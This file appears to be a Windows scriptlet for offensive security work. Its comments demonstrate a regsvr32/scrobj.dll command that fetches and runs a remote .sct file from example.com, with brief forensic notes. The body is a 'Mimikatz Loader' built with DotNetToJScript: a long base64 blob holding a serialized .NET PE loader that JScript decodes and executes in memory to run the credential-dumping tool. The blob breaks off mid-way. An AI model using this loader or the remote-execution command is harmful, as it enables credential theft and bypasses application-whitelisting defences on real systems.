<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
	<!-- DFIR -->
	<!--		.sct files are downloaded and executed from a path like this -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->


	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
	// Mimikatz Loader
	// Built with DotNetToJScript.
	function Exec()
	{
		function setversion() {
		new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
		}
		function debug(s) {}
		function base64ToStream(b) {
			var enc = new ActiveXObject("System.Text.ASCIIEncoding");
			var length = enc.GetByteCount_2(b);
			var ba = enc.GetBytes_4(b);
			var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
			ba = transform.TransformFinalBlock(ba, 0, length);
			var ms = new ActiveXObject("System.IO.MemoryStream");
			ms.Write(ba, 0, (length / 4) * 3);
			ms.Position = 0;
			return ms;
		}

		var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
		"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
		"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
		"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
		"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
		"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
		"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
		"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
		"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
		"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
		"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
		"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
		"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
		"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
		"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
		"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
		"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
		"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
		"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
		"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
		"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
		"ZW1ibHkGFwAAAARMb2FkCg8MAAAAADYAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
		"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAs6ZgWgAAAAAA"+
		"AAAA4AACIQsBCwAALgAAAAYAAAAAAACeTAAAACAAAABgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
		"AAAAAAAAAKAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAATEwA"+
		"AE8AAAAAYAAAqAIAAAAAAAAAAAAAAAAAAAAAAAAAgAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
		"AAAALnRleHQAAACkLAAAACAAAAAuAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAqAIAAABg"+
		"AAAABAAAADAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAgAAAAAIAAAA0AAAAAAAAAAAA"+
		"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"+
		"AAEAAAAsAAAADgAAAKcAAAAYAAAAHQAAAD4AAAAFAAAABAAAAAEAAAABAAAAAwAAAAoAAAAOAAAA"+
		"AgAAAAcAAAAHAAAAAgAAAAMAAAAHAAAAAQAAAAMAAAAKAAAAAQAAAAUAAAAAAAoAAQAAAAAABgAJ"+
		"AQIBBgAQAQIBBgAaAQIBBgCiAZgBBgAPApgBBgANCvEJBgApCvEJBgBYCjgKBgB4CjgKBgCfCgIB"+
		"BgDNCq4KBgAJC+0KBgAYC5gBBgAjC5gBBgA6Cy4LBgBPC5gBBgBqCwIBBgByC5gBBgCECwIBBgCJ"+
		"C5gBBgCpCwIBCgDIC70LDgD1C98LBgAfDAAMDgA0DN8LBgBrDFAMBgCgDAIBBgDUDMEMBgDpDAIB"+
		"BgALDa4KBgAgDQIBBgAlDQIBBgCzDZgBBgC8DZgBBgDXDZgBBgDzDa4KBgD8Da4KBgAnDq4KBgA9"+
		"Dq4KBgBIDq4KBgBdDq4KBgBwDq4KBgB+DgIBBgCtDp0OAAAAAAEAAAAAAAEAAQABABAAFwAAAAUA"+
		"AQABAAEAEAAhAAAABQAGAAgACgEQACoAAAAJAAwAEQAKARAAOwAAAAkAKwARAAoBEABQAAAACQAt"+
		"ABEACgEQAGgAAAAJAFsAEQAKARAAgAAAAAkAiAARABIBEACSAAAACQCPABEACgEQAKcAAAAJAJkA"+
		"EgACAQAAvQAAAA0AmwASAAAAEADOAAAABQCdABIACgEQAKcAAAAJAKEAGQAKARAA4QAAAAkAowAZ"+
		"AFGAHwEKAFGALAESAFGAOgESAFGASwESABYAYwEqAAEAuwFQAAEAxQFUAAEA0AFYAAEA4QFcAAEA"+
		"8gFgAAEABgJlAAYA9wK4AAYA/wK4AAYABgO4AAYACwO4AAYAEgO4AAYAHAO4AAYAJwO4AAYAMgO4"+
		"AAYANwO4AAYAPAO4AAYAQwO4AAYASAO4AAYATQO4AAYAVgO4AAYAXQO4AAYAZQO4AAYAbQO4AAYA"+
		"dQO4AAYAfQO4AAYAhQO4AAYAjwO4AAYAmAO4AAYAoQO4AAYAqgO4AAYAswO4AAYAvAO4AAYAxQO4"+
		"AAYAzgO4AAYA1wO4AAYA4AO4AAYA6QMSAAYA8gMSAAYAAQQSAAYABgS4AAYADAS7AAYAHwS7AAYA"+
		"MgQSAAYAPQQSAAYAUwQSAAYAawQSAAYAfwQSAAYAigQSAAYAlQQSAAYAnwQSAAYAsAQSAAYAvgS4"+
		"AAYA2gS4AAYA9gS4AAYACAW4AAYAGgW4AAYAMAW4AAYARgUSAAYAWAUSAAYAZAUSAAYAcgUSAAYA"+
		"ewW4AAYAhQW4AAYAmAUSAAYAqwUSAAYAvQUSAAYAzwUSAAYA4AUSAAYA7AUSAAYAAAa+AAYADAa+"+
		"AAYAGAa+AAYAJga+AAYANQa+AAYARga+AAYAWga+AAYAYAa+AAYAbQa+AAYAdwa+AAYAgAa+AAYA"+
		"kAa+AAYAnAa+AAYAoAa+AAYAtga+AAYAxwa+AAYABgS4AAYADAS7AAYAHwS7AAYAMgQSAAYAPQQS"+
		"AAYAUwQSAAYAawQSAAYAfwQSAAYAlQTCAAYAnwQSAAYAsAQSAAYAvgS4AAYA2gS4AAYA9gS4AAYA"+
		"CAW4AAYAGgW4AAYAMAW4AAYARgUSAAYAWAUSAAYAZAUSAAYAcgUSAAYAewW4AAYAhQW4AAYAmAXC"+
		"AAYAqwXCAAYAvQXCAAYAzwXCAAYA4AUSAAYA7AUSAAYAAAa+AAYADAa+AAYAGAa+AAYAJga+AAYA"+
		"NQa+AAYARga+AAYAWga+AAYAYAa+AAYAbQa+AAYAdwa+AAYAgAa+AAYAkAa+AAYAnAa+AAYAoAa+"+
		"AAYAtga+AAYAxwa+AAYA0Aa4AAYA2Aa4AAYA6QYSAAYA9wYSAAYADAcSAAYAHAe4AAYAMQe4AAYQ"+
		"QQfFAAYARgcSAAYA8gMSAAYAUgcSAAYAYAcSAAYAcQcSAAYAhgcSAAYAmwe4AAYArwe4AAYAMQfJ"+
		"AAYA1wcSAAYA5QcSAAYG8QcSAFaA+QfJABYA/gcSABYACQgSABYAFQgSABYALAgSAAYA1wcSAAYA"+
		"5QcSAAYAhAgSAAYA6QYSAAYAlwgSAAYAQQcSAAYApggSAFAgAAAAAJYAWQEkAAEAAAAAAIAAkSBs"+
		"AS0AAwAAAAAAgACRIHkBMQADAHggAAAAAJYAhAE8AAoA1iAAAAAAhhiSAUAACgD0IAAAAACWAKkB"+
		"RAAKAGghAAAAAJYAswFLAAsAfCkAAAAAhhiSAWkADACAKgAAAACGGJIBbgANAIArAAAAAJYAHAJ0"+
		"AA4A2CsAAAAAhggvAnwADwAALAAAAACGCEECgAAPABgsAAAAAIYIUAKFAA8AMCwAAAAAhghlAooA"+
		"DwBILAAAAACGCHoCjwAPAGAsAAAAAIYIkgKVAA8AeCwAAAAAhgjDB80ADwAAAAAAgACWIDsI2gAP"+
		"AAAAAACAAJYgSAjiABMAAAAAAIAAliBUCOcAFAAAAAAAgACWIGMI7QAWAAAAAACAAJYgcAj3ABwA"+
		"uCwAAAAAhhiSAUAAHgCVLAAAAACRGJYOPAAeAAAAAQCxCAAAAgCzCAAAAQC1CAAAAgDACAAAAwDQ"+
		"CAAABADcCAAABQDxCAAABgAHCQAABwAcCQAAAQAqCQAAAQAwCQAAAQA0CQAAAQA9CQAAAQBHCQAA"+
		"AQBOCQAAAgBaCQAAAwBfCQAABABwCQAAAQC1CAAAAQB6CQAAAgCCCQAAAQCLCQAAAgCeCQAAAwCq"+
		"CQAABAC5CQAABQC/CQAABgDPCQAAAQDaCQAAAgDiCTEAkgH9AEEAkgEDAUkAkgFAAFEApgoIAVEA"+
		"kgEMAVkAkgFpAGEAkgEWAWkAkgEcAXkAQwskAYEAkgEqAYEAXAsyAYkAfQs3AQkAkgFAAKEAkgFA"+
		"ACEAlgtJASEAnAtRAaEAoQuVAKkAtQtAALEAkgFAALEA0gtkAaEAkgFuALkAkgFqAbkARAxwAQwA"+
		"eQyAARQAhwyQAckAkwzNANkApwyVAVEAswwtAMkAvAybAeEA4Ax8AOkA8wygAVEABg0qAPEAEw2l"+
		"AVEAGA2uAfkANw2yAfEASQ26AfEAWA3BAfEAXw3HAfEAaQ3NAfEAcw3SAfEAfg3YAfEAiA3dAfEA"+
		"kw3jAVEAow3NAVEArw0kAFEAow3YAWkAkgErAikAkgFqASEAxw06AikAzA1CAhkB3A1aAqEAkgFJ"+
		"ASkA6Q13AiEBCQ59AiEBDw6HAiEBIg5AADEBkgG2AkEBkgEDAUkBkgG9AtkAkgHHAlkBkgFAAGEB"+
		"kgFAAAgABAANAAkACAAVAAkADAAaAAkAEAAfAAkAcALVACcA8wHRAi4AEwDWAi4AGwDfAmMB6wHR"+
		"Ah4BxAIIAAYA/gIBAAAAAAAGAAEAAAAAAAcAAQAAAAAACAAAAAAAjwAIAAAAkAAMAAAAkQAQAAAA"+
		"kgAUAAAAkwAYAAAAlAAcAAAAlQAgAAAAlgAiAAAAlwAkAAAAmAARAT0BWQHoAWACagKLApcCnAKh"+
		"AqYCqwKxAs0CAwABAAkABwAAAJ8CmgAAAK0CngAAALgCowAAAMkCqAAAANoCrQAAAO4CswAAAM8H"+
		"0QACAAsAAwACAAwABQACAA0ABwACAA4ACQACAA8ACwACABAADQACABEADwDgCo0OeQGJAXQCRgMF"+
		"AGwBAQBAAQcAeQEBAAABJQA7CAIARAEnAEgIAQBDASkAVAgBAAABKwBjCAIAAAEtAHAIAgAEgAAA"+
		"AAAAAAAAAAAAAAAAAACWCgAABAAAAAAAAAAAAAAAAQD5AAAAAAAEAAAAAAAAAAAAAAABAAIBAAAA"+
		"AAQAAAAAAAAAAAAAAAEA3wsAAAAABAADAAUAAwAGAAMABwADAAgAAwAJAAMACgADAAsAAwANAAwA"+
		"DgAMAAAAAAAVAC0CFAA1AhQARgIUAEsCFABQAhQAVQIAAAA8TW9kdWxlPgBuZXRrYXR6My5kbGwA"+
		"VGVzdENsYXNzAFBFTG9hZGVyAElNQUdFX0RPU19IRUFERVIASU1BR0VfREFUQV9ESVJFQ1RPUlkA"+
		"SU1BR0VfT1BUSU9OQUxfSEVBREVSMzIASU1BR0VfT1BUSU9OQUxfSEVBREVSNjQASU1BR0VfRklM"+
		"RV9IRUFERVIASU1BR0VfU0VDVElPTl9IRUFERVIASU1BR0VfQkFTRV9SRUxPQ0FUSU9OAERhdGFT"+
		"ZWN0aW9uRmxhZ3MATmF0aXZlRGVjbGFyYXRpb25zAElNQUdFX0lNUE9SVF9ERVNDUklQVE9SAG1z"+
		"Y29ybGliAFN5c3RlbQBPYmplY3QAVmFsdWVUeXBlAEVudW0ATVlfQ09ERV9QQUdFAEdFTkVSSUNf"+
		"V1JJVEUARklMRV9TSEFSRV9XUklURQBPUEVOX0VYSVNUSU5HAEludFB0ckFkZABjb2RlYmFzZQBB"+
		"bGxvY0NvbnNvbGUAQ3JlYXRlRmlsZQBDcmVhdGVDb25zb2xlAC5jdG9yAFN5c3RlbS5JTwBTdHJl"+
		"YW0AUmVhZEZ1bGx5AEV4ZWN1dGUAZG9zSGVhZGVyAGZpbGVIZWFkZXIAb3B0aW9uYWxIZWFkZXIz"+
		"MgBvcHRpb25hbEhlYWRlcjY0AGltYWdlU2VjdGlvbkhlYWRlcnMAcmF3Ynl0ZXMAQmluYXJ5UmVh"+
		"ZGVyAEZyb21CaW5hcnlSZWFkZXIAVABnZXRfSXMzMkJpdEhlYWRlcgBnZXRfRmlsZUhlYWRlcgBn"+
		"ZXRfT3B0aW9uYWxIZWFkZXIzMgBnZXRfT3B0aW9uYWxIZWFkZXI2NABnZXRfSW1hZ2VTZWN0aW9u"+
		"SGVhZGVycwBnZXRfUmF3Qnl0ZXMASXMzMkJpdEhlYWRlcgBGaWxlSGVhZGVyAE9wdGlvbmFsSGVh"+
		"ZGVyMzIAT3B0aW9uYWxIZWFkZXI2NABJbWFnZVNlY3Rpb25IZWFkZXJzAFJhd0J5dGVzAGVfbWFn"+
		"aWMAZV9jYmxwAGVfY3AAZV9jcmxjAGVfY3BhcmhkcgBlX21pbmFsbG9jAGVfbWF4YWxsb2MAZV9z"+
		"cwBlX3NwAGVfY3N1bQBlX2lwAGVfY3MAZV9sZmFybGMAZV9vdm5vAGVfcmVzXzAAZV9yZXNfMQBl"+
		"X3Jlc18yAGVfcmVzXzMAZV9vZW1pZABlX29lbWluZm8AZV9yZXMyXzAAZV9yZXMyXzEAZV9yZXMy"+
		"XzIAZV9yZXMyXzMAZV9yZXMyXzQAZV9yZXMyXzUAZV9yZXMyXzYAZV9yZXMyXzcAZV9yZXMyXzgA"+
		"ZV9yZXMyXzkAZV9sZmFuZXcAVmlydHVhbEFkZHJlc3MAU2l6ZQBNYWdpYwBNYWpvckxpbmtlclZl"+
		"cnNpb24ATWlub3JMaW5rZXJWZXJzaW9uAFNpemVPZkNvZGUAU2l6ZU9mSW5pdGlhbGl6ZWREYXRh"+
		"AFNpemVPZlVuaW5pdGlhbGl6ZWREYXRhAEFkZHJlc3NPZkVudHJ5UG9pbnQAQmFzZU9mQ29kZQBC"+
		"YXNlT2ZEYXRhAEltYWdlQmFzZQBTZWN0aW9uQWxpZ25tZW50AEZpbGVBbGlnbm1lbnQATWFqb3JP"+
		"cGVyYXRpbmdTeXN0ZW1WZXJzaW9uAE1pbm9yT3BlcmF0aW5nU3lzdGVtVmVyc2lvbgBNYWpvcklt"+
		"YWdlVmVyc2lvbgBNaW5vckltYWdlVmVyc2lvbgBNYWpvclN1YnN5c3RlbVZlcnNpb24ATWlub3JT"+
		"dWJzeXN0ZW1WZXJzaW9uAFdpbjMyVmVyc2lvblZhbHVlAFNpemVPZkltYWdlAFNpemVPZkhlYWRl"+
		"cnMAQ2hlY2tTdW0AU3Vic3lzdGVtAERsbENoYXJhY3RlcmlzdGljcwBTaXplT2ZTdGFja1Jlc2Vy"+
		"dmUAU2l6ZU9mU3RhY2tDb21taXQAU2l6ZU9mSGVhcFJlc2VydmUAU2l6ZU9mSGVhcENvbW1pdABM"+
		"b2FkZXJGbGFncwBOdW1iZXJPZlJ2YUFuZFNpemVzAEV4cG9ydFRhYmxlAEltcG9ydFRhYmxlAFJl"+
		"c291cmNlVGFibGUARXhjZXB0aW9uVGFibGUAQ2VydGlmaWNhdGVUYWJsZQBCYXNlUmVsb2NhdGlv"+
		"blRhYmxlAERlYnVnAEFyY2hpdGVjdHVyZQBHbG9iYWxQdHIAVExTVGFibGUATG9hZENvbmZpZ1Rh"+
		"YmxlAEJvdW5kSW1wb3J0AElBVABEZWxheUltcG9ydERlc2NyaXB0b3IAQ0xSUnVudGltZUhlYWRl"+
		"cgBSZXNlcnZlZABNYWNoaW5lAE51bWJlck9mU2VjdGlvbnMAVGltZURhdGVTdGFtcABQb2ludGVy"+
		"VG9TeW1ib2xUYWJsZQBOdW1iZXJPZlN5bWJvbHMAU2l6ZU9mT3B0aW9uYWxIZWFkZXIAQ2hhcmFj"+
		"dGVyaXN0aWNzAE5hbWUAVmlydHVhbFNpemUAU2l6ZU9mUmF3RGF0YQBQb2ludGVyVG9SYXdEYXRh"+
		"AFBvaW50ZXJUb1JlbG9jYXRpb25zAFBvaW50ZXJUb0xpbmVudW1iZXJzAE51bWJlck9mUmVsb2Nh"+
		"dGlvbnMATnVtYmVyT2ZMaW5lbnVtYmVycwBnZXRfU2VjdGlvbgBTZWN0aW9uAFZpcnR1YWxBZHJl"+
		"c3MAU2l6ZU9mQmxvY2sAdmFsdWVfXwBTdHViAE1FTV9DT01NSVQATUVNX1JFU0VSVkUAUEFHRV9F"+
		"WEVDVVRFX1JFQURXUklURQBQQUdFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MATG9hZExpYnJhcnkA"+
		"R2V0UHJvY0FkZHJlc3MAQ3JlYXRlVGhyZWFkAFdhaXRGb3JTaW5nbGVPYmplY3QAT3JpZ2luYWxG"+
		"aXJzdFRodW5rAEZvcndhcmRlckNoYWluAEZpcnN0VGh1bmsAYQBiAGxwRmlsZU5hbWUAZHdEZXNp"+
		"cmVkQWNjZXNzAGR3U2hhcmVNb2RlAGxwU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25EaXNw"+
		"b3NpdGlvbgBkd0ZsYWdzQW5kQXR0cmlidXRlcwBoVGVtcGxhdGVGaWxlAGlucHV0AHVybABmaWxl"+
		"UGF0aABmaWxlQnl0ZXMAcmVhZGVyAGxwU3RhcnRBZGRyAHNpemUAZmxBbGxvY2F0aW9uVHlwZQBm"+
